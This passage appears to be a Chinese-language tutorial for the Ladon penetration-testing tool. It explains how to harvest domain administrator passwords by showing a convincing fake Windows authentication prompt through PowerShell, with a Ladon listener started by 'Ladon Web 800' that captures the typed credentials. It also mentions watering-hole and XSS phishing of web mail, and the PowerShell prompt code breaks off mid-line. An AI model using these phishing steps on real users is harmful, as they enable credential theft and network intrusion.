版本
>= Ladon 6.6.3
原理
使用PowerShell模仿Windowns登陆认证获取管理员密码,Ladon监听捕获基础认证密码。
应用场景
域控或管理员密码获取,当前权限很低又无法提权时。(有权限直接读明文或HASH)
Ladon监听
该功能模仿了MSF里的基础认证监听模块,但最大的优势在于无需占用系统大量空间和内存。
可直接部署在目标内网或VPS上,也无需复杂命令,直接输以下命令一键监听自动捕获密码。
其它用途:http://k8gege.org/Ladon/webser.html
Ladon Web 800
PowerShell
执行以下脚本代码,会弹出十分逼真的基础认证登陆窗口,自动获取用户名和域来提高真实性。
当然也可以使用其它脚本或语言,如JS水坑攻击、XSS截取各种WEB邮箱密码等等多种钩鱼姿势。
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [E